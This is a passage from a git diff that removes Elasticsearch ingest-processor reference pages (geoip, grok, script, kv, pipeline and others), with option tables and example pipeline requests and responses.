--------------------------------------------------- - -Which returns: - -[source,console-result] --------------------------------------------------- -{ - "_index" : "my-index-00001", - "_type" : "_doc", - "_id" : "my_id", - "_version" : 1, - "_seq_no" : 71, - "_primary_term": 1, - "found" : true, - "_source" : { - "ip" : "80.231.5.0" - } -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - -[[ingest-geoip-mappings-note]] -===== Recognizing Location as a Geopoint -Although this processor enriches your document with a `location` field containing -the estimated latitude and longitude of the IP address, this field will not be -indexed as a {ref}/geo-point.html[`geo_point`] type in Elasticsearch without explicitly defining it -as such in the mapping. - -You can use the following mapping for the example index above: - -[source,console] --------------------------------------------------- -PUT my_ip_locations -{ - "mappings": { - "properties": { - "geoip": { - "properties": { - "location": { "type": "geo_point" } - } - } - } - } -} --------------------------------------------------- - -//// -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/geoip -{ - "description" : "Add geoip info", - "processors" : [ - { - "geoip" : { - "field" : "ip" - } - } - ] -} - -PUT my_ip_locations/_doc/1?refresh=true&pipeline=geoip -{ - "ip": "8.8.8.8" -} - -GET /my_ip_locations/_search -{ - "query": { - "bool": { - "must": { - "match_all": {} - }, - "filter": { - "geo_distance": { - "distance": "1m", - "geoip.location": { - "lon": -97.822, - "lat": 37.751 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "took" : 3, - "timed_out" : false, - "_shards" : { - "total" : 1, - "successful" : 1, - "skipped" : 0, - "failed" : 0 - }, - "hits" : { - "total" : { - "value": 1, - "relation": "eq" - }, - "max_score" : 1.0, - "hits" : [ - { - "_index" : "my_ip_locations", - "_type" : "_doc", - "_id" : "1", - "_score" : 1.0, - "_source" : { - "geoip" : { - "continent_name" : "North America", - "country_name" : "United States", - "country_iso_code" : "US", - "location" : { - "lon" : -97.822, - "lat" : 37.751 - } - }, - "ip" : "8.8.8.8" - } - } - ] - } -} --------------------------------------------------- -// TESTRESPONSE[s/"took" : 3/"took" : $body.took/] -//// - -[[ingest-geoip-settings]] -===== Node Settings - -The `geoip` processor supports the following setting: - -`ingest.geoip.cache_size`:: - - The maximum number of results that should be cached. Defaults to `1000`. - -Note that these settings are node settings and apply to all `geoip` processors, i.e. there is one cache for all defined `geoip` processors. diff --git a/docs/reference/ingest/processors/grok.asciidoc b/docs/reference/ingest/processors/grok.asciidoc deleted file mode 100644 index 1c7e6d1b0aa..00000000000 --- a/docs/reference/ingest/processors/grok.asciidoc +++ /dev/null @@ -1,376 +0,0 @@ -[[grok-processor]] -=== Grok processor -++++ -Grok -++++ - -Extracts structured fields out of a single text field within a document. You choose which field to -extract matched fields from, as well as the grok pattern you expect will match. A grok pattern is like a regular -expression that supports aliased expressions that can be reused. - -This tool is perfect for syslog logs, apache and other webserver logs, mysql logs, and in general, any log format -that is generally written for humans and not computer consumption. -This processor comes packaged with many -https://github.com/elastic/elasticsearch/blob/{branch}/libs/grok/src/main/resources/patterns[reusable patterns]. - -If you need help building patterns to match your logs, you will find the {kibana-ref}/xpack-grokdebugger.html[Grok Debugger] tool quite useful! The Grok Debugger is an {xpack} feature under the Basic License and is therefore *free to use*. The https://grokconstructor.appspot.com[Grok Constructor] is also a useful tool. - -[[grok-basics]] -==== Grok Basics - -Grok sits on top of regular expressions, so any regular expressions are valid in grok as well. -The regular expression library is Oniguruma, and you can see the full supported regexp syntax -https://github.com/kkos/oniguruma/blob/master/doc/RE[on the Oniguruma site]. - -Grok works by leveraging this regular expression language to allow naming existing patterns and combining them into more -complex patterns that match your fields. - -The syntax for reusing a grok pattern comes in three forms: `%{SYNTAX:SEMANTIC}`, `%{SYNTAX}`, `%{SYNTAX:SEMANTIC:TYPE}`. - -The `SYNTAX` is the name of the pattern that will match your text. For example, `3.44` will be matched by the `NUMBER` -pattern and `55.3.244.1` will be matched by the `IP` pattern. The syntax is how you match. `NUMBER` and `IP` are both -patterns that are provided within the default patterns set. - -The `SEMANTIC` is the identifier you give to the piece of text being matched. For example, `3.44` could be the -duration of an event, so you could call it simply `duration`. Further, a string `55.3.244.1` might identify -the `client` making a request. - -The `TYPE` is the type you wish to cast your named field. `int`, `long`, `double`, `float` and `boolean` are supported types for coercion. - -For example, you might want to match the following text: - -[source,txt] --------------------------------------------------- -3.44 55.3.244.1 --------------------------------------------------- - -You may know that the message in the example is a number followed by an IP address. You can match this text by using the following -Grok expression. - -[source,txt] --------------------------------------------------- -%{NUMBER:duration} %{IP:client} --------------------------------------------------- - -[[using-grok]] -==== Using the Grok Processor in a Pipeline - -[[grok-options]] -.Grok Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to use for grok expression parsing -| `patterns` | yes | - | An ordered list of grok expression to match and extract named captures with. Returns on the first expression in the list that matches. -| `pattern_definitions` | no | - | A map of pattern-name and pattern tuples defining custom patterns to be used by the current processor. Patterns matching existing names will override the pre-existing definition. -| `trace_match` | no | false | when true, `_ingest._grok_match_index` will be inserted into your matched document's metadata with the index into the pattern found in `patterns` that matched. -| `ignore_missing` | no | false | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -Here is an example of using the provided patterns to extract out and name structured fields from a string field in -a document. - -[source,console] --------------------------------------------------- -POST _ingest/pipeline/_simulate -{ - "pipeline": { - "description" : "...", - "processors": [ - { - "grok": { - "field": "message", - "patterns": ["%{IP:client} %{WORD:method} %{URIPATHPARAM:request} %{NUMBER:bytes:int} %{NUMBER:duration:double}"] - } - } - ] - }, - "docs":[ - { - "_source": { - "message": "55.3.244.1 GET /index.html 15824 0.043" - } - } - ] -} --------------------------------------------------- - -This pipeline will insert these named captures as new fields within the document, like so: - -[source,console-result] --------------------------------------------------- -{ - "docs": [ - { - "doc": { - "_index": "_index", - "_type": "_doc", - "_id": "_id", - "_source" : { - "duration" : 0.043, - "request" : "/index.html", - "method" : "GET", - "bytes" : 15824, - "client" : "55.3.244.1", - "message" : "55.3.244.1 GET /index.html 15824 0.043" - }, - "_ingest": { - "timestamp": "2016-11-08T19:43:03.850+0000" - } - } - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/2016-11-08T19:43:03.850\+0000/$body.docs.0.doc._ingest.timestamp/] - -[[custom-patterns]] -==== Custom Patterns - -The Grok processor comes pre-packaged with a base set of patterns. These patterns may not always have -what you are looking for. Patterns have a very basic format. Each entry has a name and the pattern itself. - -You can add your own patterns to a processor definition under the `pattern_definitions` option. -Here is an example of a pipeline specifying custom pattern definitions: - -[source,js] --------------------------------------------------- -{ - "description" : "...", - "processors": [ - { - "grok": { - "field": "message", - "patterns": ["my %{FAVORITE_DOG:dog} is colored %{RGB:color}"], - "pattern_definitions" : { - "FAVORITE_DOG" : "beagle", - "RGB" : "RED|GREEN|BLUE" - } - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -[[trace-match]] -==== Providing Multiple Match Patterns - -Sometimes one pattern is not enough to capture the potential structure of a field. Let's assume we -want to match all messages that contain your favorite pet breeds of either cats or dogs. One way to accomplish -this is to provide two distinct patterns that can be matched, instead of one really complicated expression capturing -the same `or` behavior. - -Here is an example of such a configuration executed against the simulate API: - -[source,console] --------------------------------------------------- -POST _ingest/pipeline/_simulate -{ - "pipeline": { - "description" : "parse multiple patterns", - "processors": [ - { - "grok": { - "field": "message", - "patterns": ["%{FAVORITE_DOG:pet}", "%{FAVORITE_CAT:pet}"], - "pattern_definitions" : { - "FAVORITE_DOG" : "beagle", - "FAVORITE_CAT" : "burmese" - } - } - } - ] -}, -"docs":[ - { - "_source": { - "message": "I love burmese cats!" - } - } - ] -} --------------------------------------------------- - -response: - -[source,console-result] --------------------------------------------------- -{ - "docs": [ - { - "doc": { - "_type": "_doc", - "_index": "_index", - "_id": "_id", - "_source": { - "message": "I love burmese cats!", - "pet": "burmese" - }, - "_ingest": { - "timestamp": "2016-11-08T19:43:03.850+0000" - } - } - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/2016-11-08T19:43:03.850\+0000/$body.docs.0.doc._ingest.timestamp/] - -Both patterns will set the field `pet` with the appropriate match, but what if we want to trace which of our -patterns matched and populated our fields? We can do this with the `trace_match` parameter. Here is the output of -that same pipeline, but with `"trace_match": true` configured: - -//// -Hidden setup for example: -[source,console] --------------------------------------------------- -POST _ingest/pipeline/_simulate -{ - "pipeline": { - "description" : "parse multiple patterns", - "processors": [ - { - "grok": { - "field": "message", - "patterns": ["%{FAVORITE_DOG:pet}", "%{FAVORITE_CAT:pet}"], - "trace_match": true, - "pattern_definitions" : { - "FAVORITE_DOG" : "beagle", - "FAVORITE_CAT" : "burmese" - } - } - } - ] -}, -"docs":[ - { - "_source": { - "message": "I love burmese cats!" - } - } - ] -} --------------------------------------------------- -//// - -[source,console-result] --------------------------------------------------- -{ - "docs": [ - { - "doc": { - "_type": "_doc", - "_index": "_index", - "_id": "_id", - "_source": { - "message": "I love burmese cats!", - "pet": "burmese" - }, - "_ingest": { - "_grok_match_index": "1", - "timestamp": "2016-11-08T19:43:03.850+0000" - } - } - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/2016-11-08T19:43:03.850\+0000/$body.docs.0.doc._ingest.timestamp/] - -In the above response, you can see that the index of the pattern that matched was `"1"`. This is to say that it was the -second (index starts at zero) pattern in `patterns` to match. - -This trace metadata enables debugging which of the patterns matched. This information is stored in the ingest -metadata and will not be indexed. - -[[grok-processor-rest-get]] -==== Retrieving patterns from REST endpoint - -The Grok Processor comes packaged with its own REST endpoint for retrieving which patterns the processor is packaged with. - -[source,console] --------------------------------------------------- -GET _ingest/processor/grok --------------------------------------------------- - -The above request will return a response body containing a key-value representation of the built-in patterns dictionary. - -[source,js] --------------------------------------------------- -{ - "patterns" : { - "BACULA_CAPACITY" : "%{INT}{1,3}(,%{INT}{3})*", - "PATH" : "(?:%{UNIXPATH}|%{WINPATH})", - ... -} --------------------------------------------------- -// NOTCONSOLE - -By default, the API returns patterns in the order they are read from disk. This -sort order preserves groupings of related patterns. For example, all patterns -related to parsing Linux syslog lines stay grouped together. - -You can use the optional boolean `s` query parameter to sort returned patterns -by key name instead. - -[source,console] --------------------------------------------------- -GET _ingest/processor/grok?s --------------------------------------------------- - -The API returns the following response. - -[source,js] --------------------------------------------------- -{ - "patterns" : { - "BACULA_CAPACITY" : "%{INT}{1,3}(,%{INT}{3})*", - "BACULA_DEVICE" : "%{USER}", - "BACULA_DEVICEPATH" : "%{UNIXPATH}", - ... -} --------------------------------------------------- -// NOTCONSOLE - - -This can be useful to reference as the built-in patterns change across versions. - -[[grok-watchdog]] -==== Grok watchdog - -Grok expressions that take too long to execute are interrupted and -the grok processor then fails with an exception. The grok -processor has a watchdog thread that determines when evaluation of -a grok expression takes too long and is controlled by the following -settings: - -[[grok-watchdog-options]] -.Grok watchdog settings -[options="header"] -|====== -| Name | Default | Description -| `ingest.grok.watchdog.interval` | 1s | How often to check whether there are grok evaluations that take longer than the maximum allowed execution time. -| `ingest.grok.watchdog.max_execution_time` | 1s | The maximum allowed execution of a grok expression evaluation. -|====== - -[[grok-debugging]] -==== Grok debugging - -It is advised to use the {kibana-ref}/xpack-grokdebugger.html[Grok Debugger] to debug grok patterns. From there you can test one or more -patterns in the UI against sample data. Under the covers it uses the same engine as ingest node processor. - -Additionally, it is recommended to enable debug logging for Grok so that any additional messages may also be seen in the Elasticsearch -server log. - -[source,js] --------------------------------------------------- -PUT _cluster/settings -{ - "transient": { - "logger.org.elasticsearch.ingest.common.GrokProcessor": "debug" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/gsub.asciidoc b/docs/reference/ingest/processors/gsub.asciidoc deleted file mode 100644 index bd84336b8f5..00000000000 --- a/docs/reference/ingest/processors/gsub.asciidoc +++ /dev/null @@ -1,33 +0,0 @@ -[[gsub-processor]] -=== Gsub processor -++++ -Gsub -++++ - -Converts a string field by applying a regular expression and a replacement. -If the field is an array of string, all members of the array will be converted. If any non-string values are encountered, the processor will throw an exception. - -[[gsub-options]] -.Gsub Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to apply the replacement to -| `pattern` | yes | - | The pattern to be replaced -| `replacement` | yes | - | The string to replace the matching patterns with -| `target_field` | no | `field` | The field to assign the converted value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "gsub": { - "field": "field1", - "pattern": "\\.", - "replacement": "-" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/html_strip.asciidoc b/docs/reference/ingest/processors/html_strip.asciidoc deleted file mode 100644 index 6e95015d253..00000000000 --- a/docs/reference/ingest/processors/html_strip.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ -[[htmlstrip-processor]] -=== HTML strip processor -++++ -HTML strip -++++ - -Removes HTML tags from the field. If the field is an array of strings, HTML tags will be removed from all members of the array. - -NOTE: Each HTML tag is replaced with a `\n` character. - -[[htmlstrip-options]] -.HTML Strip Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The string-valued field to remove HTML tags from -| `target_field` | no | `field` | The field to assign the value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "html_strip": { - "field": "foo" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/inference.asciidoc b/docs/reference/ingest/processors/inference.asciidoc deleted file mode 100644 index 5c7d6a3cd52..00000000000 --- a/docs/reference/ingest/processors/inference.asciidoc +++ /dev/null @@ -1,194 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[inference-processor]] -=== {infer-cap} processor -++++ -{infer-cap} -++++ - -experimental::[] - -Uses a pre-trained {dfanalytics} model to infer against the data that is being -ingested in the pipeline. - - -[[inference-options]] -.{infer-cap} Options -[options="header"] -|====== -| Name | Required | Default | Description -| `model_id` | yes | - | (String) The ID of the model to load and infer against. -| `target_field` | no | `ml.inference.` | (String) Field added to incoming documents to contain results objects. -| `field_map` | no | If defined the model's default field map | (Object) Maps the document field names to the known field names of the model. This mapping takes precedence over any default mappings provided in the model configuration. -| `inference_config` | no | The default settings defined in the model | (Object) Contains the inference type and its options. There are two types: <> and <>. -include::common-options.asciidoc[] -|====== - - -[source,js] --------------------------------------------------- -{ - "inference": { - "model_id": "flight_delay_regression-1571767128603", - "target_field": "FlightDelayMin_prediction_infer", - "field_map": { - "your_field": "my_field" - }, - "inference_config": { "regression": {} } - } -} --------------------------------------------------- -// NOTCONSOLE - - -[discrete] -[[inference-processor-regression-opt]] -==== {regression-cap} configuration options - -Regression configuration for inference. - -`results_field`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-results-field-processor] - -`num_top_feature_importance_values`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-regression-num-top-feature-importance-values] - - -[discrete] -[[inference-processor-classification-opt]] -==== {classification-cap} configuration options - -Classification configuration for inference. - -`num_top_classes`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-classes] - -`num_top_feature_importance_values`:: -(Optional, integer) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-num-top-feature-importance-values] - -`results_field`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-results-field-processor] - -`top_classes_results_field`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-top-classes-results-field] - -`prediction_field_type`:: -(Optional, string) -include::{es-repo-dir}/ml/ml-shared.asciidoc[tag=inference-config-classification-prediction-field-type] - -[discrete] -[[inference-processor-config-example]] -==== `inference_config` examples - -[source,js] --------------------------------------------------- -"inference":{ - "model_id":"my_model_id" - "inference_config": { - "regression": { - "results_field": "my_regression" - } - } -} --------------------------------------------------- -// NOTCONSOLE - -This configuration specifies a `regression` inference and the results are -written to the `my_regression` field contained in the `target_field` results -object. - - -[source,js] --------------------------------------------------- -"inference":{ - "model_id":"my_model_id" - "inference_config": { - "classification": { - "num_top_classes": 2, - "results_field": "prediction", - "top_classes_results_field": "probabilities" - } - } -} --------------------------------------------------- -// NOTCONSOLE - -This configuration specifies a `classification` inference. The number of -categories for which the predicted probabilities are reported is 2 -(`num_top_classes`). The result is written to the `prediction` field and the top -classes to the `probabilities` field. Both fields are contained in the -`target_field` results object. - -Refer to the -{ml-docs}/ml-lang-ident.html#ml-lang-ident-example[language identification] -trained model documentation for a full example. - - -[discrete] -[[inference-processor-feature-importance]] -==== {feat-imp-cap} object mapping - -To get the full benefit of aggregating and searching for -{ml-docs}/ml-feature-importance.html[{feat-imp}], update your index mapping of -the {feat-imp} result field as you can see below: - -[source,js] --------------------------------------------------- -"ml.inference.feature_importance": { - "type": "nested", - "dynamic": true, - "properties": { - "feature_name": { - "type": "keyword" - }, - "importance": { - "type": "double" - } - } -} --------------------------------------------------- -// NOTCONSOLE - -The mapping field name for {feat-imp} (in the example above, it is -`ml.inference.feature_importance`) is compounded as follows: - -``.``.`feature_importance` - -* ``: defaults to `ml.inference`. -* ``: if is not provided in the processor definition, then it is -not part of the field path. - -For example, if you provide a tag `foo` in the definition as you can see below: - -[source,js] --------------------------------------------------- -{ - "tag": "foo", - ... -} --------------------------------------------------- -// NOTCONSOLE - - -Then, the {feat-imp} value is written to the -`ml.inference.foo.feature_importance` field. - -You can also specify the target field as follows: - -[source,js] --------------------------------------------------- -{ - "tag": "foo", - "target_field": "my_field" -} --------------------------------------------------- -// NOTCONSOLE - -In this case, {feat-imp} is exposed in the -`my_field.foo.feature_importance` field. diff --git a/docs/reference/ingest/processors/join.asciidoc b/docs/reference/ingest/processors/join.asciidoc deleted file mode 100644 index 6cb363940e2..00000000000 --- a/docs/reference/ingest/processors/join.asciidoc +++ /dev/null @@ -1,30 +0,0 @@ -[[join-processor]] -=== Join processor -++++ -Join -++++ - -Joins each element of an array into a single string using a separator character between each element. -Throws an error when the field is not an array. - -[[join-options]] -.Join Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | Field containing array values to join -| `separator` | yes | - | The separator character -| `target_field` | no | `field` | The field to assign the joined value to, by default `field` is updated in-place -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "join": { - "field": "joined_array_field", - "separator": "-" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/json.asciidoc b/docs/reference/ingest/processors/json.asciidoc deleted file mode 100644 index 2ccefbb0ef1..00000000000 --- a/docs/reference/ingest/processors/json.asciidoc +++ /dev/null @@ -1,92 +0,0 @@ -[[json-processor]] -=== JSON processor -++++ -JSON -++++ - -Converts a JSON string into a structured JSON object. - -[[json-options]] -.Json Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to be parsed. -| `target_field` | no | `field` | The field that the converted structured object will be written into. Any existing content in this field will be overwritten. -| `add_to_root` | no | false | Flag that forces the serialized json to be injected into the top level of the document. `target_field` must not be set when this option is chosen. -include::common-options.asciidoc[] -|====== - -All JSON-supported types will be parsed (null, boolean, number, array, object, string). - -Suppose you provide this configuration of the `json` processor: - -[source,js] --------------------------------------------------- -{ - "json" : { - "field" : "string_source", - "target_field" : "json_target" - } -} --------------------------------------------------- -// NOTCONSOLE - -If the following document is processed: - -[source,js] --------------------------------------------------- -{ - "string_source": "{\"foo\": 2000}" -} --------------------------------------------------- -// NOTCONSOLE - -after the `json` processor operates on it, it will look like: - -[source,js] --------------------------------------------------- -{ - "string_source": "{\"foo\": 2000}", - "json_target": { - "foo": 2000 - } -} --------------------------------------------------- -// NOTCONSOLE - -If the following configuration is provided, omitting the optional `target_field` setting: -[source,js] --------------------------------------------------- -{ - "json" : { - "field" : "source_and_target" - } -} --------------------------------------------------- -// NOTCONSOLE - -then after the `json` processor operates on this document: - -[source,js] --------------------------------------------------- -{ - "source_and_target": "{\"foo\": 2000}" -} --------------------------------------------------- -// NOTCONSOLE - -it will look like: - -[source,js] --------------------------------------------------- -{ - "source_and_target": { - "foo": 2000 - } -} --------------------------------------------------- -// NOTCONSOLE - -This illustrates that, unless it is explicitly named in the processor configuration, the `target_field` -is the same field provided in the required `field` configuration. diff --git a/docs/reference/ingest/processors/kv.asciidoc b/docs/reference/ingest/processors/kv.asciidoc deleted file mode 100644 index f8e251925af..00000000000 --- a/docs/reference/ingest/processors/kv.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ -[[kv-processor]] -=== KV processor -++++ -KV -++++ - -This processor helps automatically parse messages (or specific event fields) which are of the `foo=bar` variety. - -For example, if you have a log message which contains `ip=1.2.3.4 error=REFUSED`, you can parse those fields automatically by configuring: - -[source,js] --------------------------------------------------- -{ - "kv": { - "field": "message", - "field_split": " ", - "value_split": "=" - } -} --------------------------------------------------- -// NOTCONSOLE - -TIP: Using the KV Processor can result in field names that you cannot control. Consider using the <> data type instead, which maps an entire object as a single field and allows for simple searches over its contents. - -[[kv-options]] -.KV Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to be parsed -| `field_split` | yes | - | Regex pattern to use for splitting key-value pairs -| `value_split` | yes | - | Regex pattern to use for splitting the key from the value within a key-value pair -| `target_field` | no | `null` | The field to insert the extracted keys into. Defaults to the root of the document -| `include_keys` | no | `null` | List of keys to filter and insert into document. Defaults to including all keys -| `exclude_keys` | no | `null` | List of keys to exclude from document -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -| `prefix` | no | `null` | Prefix to be added to extracted keys -| `trim_key` | no | `null` | String of characters to trim from extracted keys -| `trim_value` | no | `null` | String of characters to trim from extracted values -| `strip_brackets` | no | `false` | If `true` strip brackets `()`, `<>`, `[]` as well as quotes `'` and `"` from extracted values -include::common-options.asciidoc[] -|====== diff --git a/docs/reference/ingest/processors/lowercase.asciidoc b/docs/reference/ingest/processors/lowercase.asciidoc deleted file mode 100644 index 2e95b1eca6c..00000000000 --- a/docs/reference/ingest/processors/lowercase.asciidoc +++ /dev/null @@ -1,28 +0,0 @@ -[[lowercase-processor]] -=== Lowercase processor -++++ -Lowercase -++++ - -Converts a string to its lowercase equivalent. If the field is an array of strings, all members of the array will be converted. - -[[lowercase-options]] -.Lowercase Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to make lowercase -| `target_field` | no | `field` | The field to assign the converted value to, by default `field` is updated in-place -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "lowercase": { - "field": "foo" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/pipeline.asciidoc b/docs/reference/ingest/processors/pipeline.asciidoc deleted file mode 100644 index a663b704292..00000000000 --- a/docs/reference/ingest/processors/pipeline.asciidoc +++ /dev/null @@ -1,117 +0,0 @@ -[[pipeline-processor]] -=== Pipeline processor -++++ -Pipeline -++++ - -Executes another pipeline. - -[[pipeline-options]] -.Pipeline Options -[options="header"] -|====== -| Name | Required | Default | Description -| `name` | yes | - | The name of the pipeline to execute. Supports <>. -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "pipeline": { - "name": "inner-pipeline" - } -} --------------------------------------------------- -// NOTCONSOLE - -The name of the current pipeline can be accessed from the `_ingest.pipeline` ingest metadata key. - -An example of using this processor for nesting pipelines would be: - -Define an inner pipeline: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/pipelineA -{ - "description" : "inner pipeline", - "processors" : [ - { - "set" : { - "field": "inner_pipeline_set", - "value": "inner" - } - } - ] -} --------------------------------------------------- - -Define another pipeline that uses the previously defined inner pipeline: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/pipelineB -{ - "description" : "outer pipeline", - "processors" : [ - { - "pipeline" : { - "name": "pipelineA" - } - }, - { - "set" : { - "field": "outer_pipeline_set", - "value": "outer" - } - } - ] -} --------------------------------------------------- -// TEST[continued] - -Now indexing a document while applying the outer pipeline will see the inner pipeline executed -from the outer pipeline: - -[source,console] --------------------------------------------------- -PUT /my-index/_doc/1?pipeline=pipelineB -{ - "field": "value" -} --------------------------------------------------- -// TEST[continued] - -Response from the index request: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index", - "_type": "_doc", - "_id": "1", - "_version": 1, - "result": "created", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "_seq_no": 66, - "_primary_term": 1, -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - -Indexed document: - -[source,js] --------------------------------------------------- -{ - "field": "value", - "inner_pipeline_set": "inner", - "outer_pipeline_set": "outer" -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/remove.asciidoc b/docs/reference/ingest/processors/remove.asciidoc deleted file mode 100644 index 57e785c2de7..00000000000 --- a/docs/reference/ingest/processors/remove.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[[remove-processor]] -=== Remove processor -++++ -Remove -++++ - -Removes existing fields. If one field doesn't exist, an exception will be thrown. - -[[remove-options]] -.Remove Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | Fields to be removed. Supports <>. -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -Here is an example to remove a single field: - -[source,js] --------------------------------------------------- -{ - "remove": { - "field": "user_agent" - } -} --------------------------------------------------- -// NOTCONSOLE - -To remove multiple fields, you can use the following query: - -[source,js] --------------------------------------------------- -{ - "remove": { - "field": ["user_agent", "url"] - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/rename.asciidoc b/docs/reference/ingest/processors/rename.asciidoc deleted file mode 100644 index 538cfb048a8..00000000000 --- a/docs/reference/ingest/processors/rename.asciidoc +++ /dev/null @@ -1,29 +0,0 @@ -[[rename-processor]] -=== Rename processor -++++ -Rename -++++ - -Renames an existing field. If the field doesn't exist or the new name is already used, an exception will be thrown. - -[[rename-options]] -.Rename Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to be renamed. Supports <>. -| `target_field` | yes | - | The new name of the field. Supports <>. -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "rename": { - "field": "provider", - "target_field": "cloud.provider" - } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/script.asciidoc b/docs/reference/ingest/processors/script.asciidoc deleted file mode 100644 index 3453a966133..00000000000 --- a/docs/reference/ingest/processors/script.asciidoc +++ /dev/null @@ -1,104 +0,0 @@ -[[script-processor]] -=== Script processor -++++ -Script -++++ - -Allows inline and stored scripts to be executed within ingest pipelines. - -See <> to learn more about writing scripts. The Script Processor -leverages caching of compiled scripts for improved performance. Since the -script specified within the processor is potentially re-compiled per document, it is important -to understand how script caching works. To learn more about -caching see <>. - -[[script-options]] -.Script Options -[options="header"] -|====== -| Name | Required | Default | Description -| `lang` | no | "painless" | The scripting language -| `id` | no | - | The stored script id to refer to -| `source` | no | - | An inline script to be executed -| `params` | no | - | Script Parameters -include::common-options.asciidoc[] -|====== - -One of `id` or `source` options must be provided in order to properly reference a script to execute. - -You can access the current ingest document from within the script context by using the `ctx` variable. - -The following example sets a new field called `field_a_plus_b_times_c` to be the sum of two existing -numeric fields `field_a` and `field_b` multiplied by the parameter param_c: - -[source,js] --------------------------------------------------- -{ - "script": { - "lang": "painless", - "source": "ctx.field_a_plus_b_times_c = (ctx.field_a + ctx.field_b) * params.param_c", - "params": { - "param_c": 10 - } - } -} --------------------------------------------------- -// NOTCONSOLE - -It is possible to use the Script Processor to manipulate document metadata like `_index` and `_type` during -ingestion. Here is an example of an Ingest Pipeline that renames the index and type to `my-index` no matter what -was provided in the original index request: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/my-index -{ - "description": "use index:my-index", - "processors": [ - { - "script": { - "source": """ - ctx._index = 'my-index'; - ctx._type = '_doc'; - """ - } - } - ] -} --------------------------------------------------- - -Using the above pipeline, we can attempt to index a document into the `any-index` index. - -[source,console] --------------------------------------------------- -PUT any-index/_doc/1?pipeline=my-index -{ - "message": "text" -} --------------------------------------------------- -// TEST[continued] - -The response from the above index request: - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index", - "_type": "_doc", - "_id": "1", - "_version": 1, - "result": "created", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "_seq_no": 89, - "_primary_term": 1, -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no": \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - -In the above response, you can see that our document was actually indexed into `my-index` instead of -`any-index`. This type of manipulation is often convenient in pipelines that have various branches of transformation, -and depending on the progress made, indexed into different indices. diff --git a/docs/reference/ingest/processors/set-security-user.asciidoc b/docs/reference/ingest/processors/set-security-user.asciidoc deleted file mode 100644 index cd348e2d9bc..00000000000 --- a/docs/reference/ingest/processors/set-security-user.asciidoc +++ /dev/null @@ -1,45 +0,0 @@ -[[ingest-node-set-security-user-processor]] -=== Set security user processor -++++ -Set security user -++++ - -Sets user-related details (such as `username`, 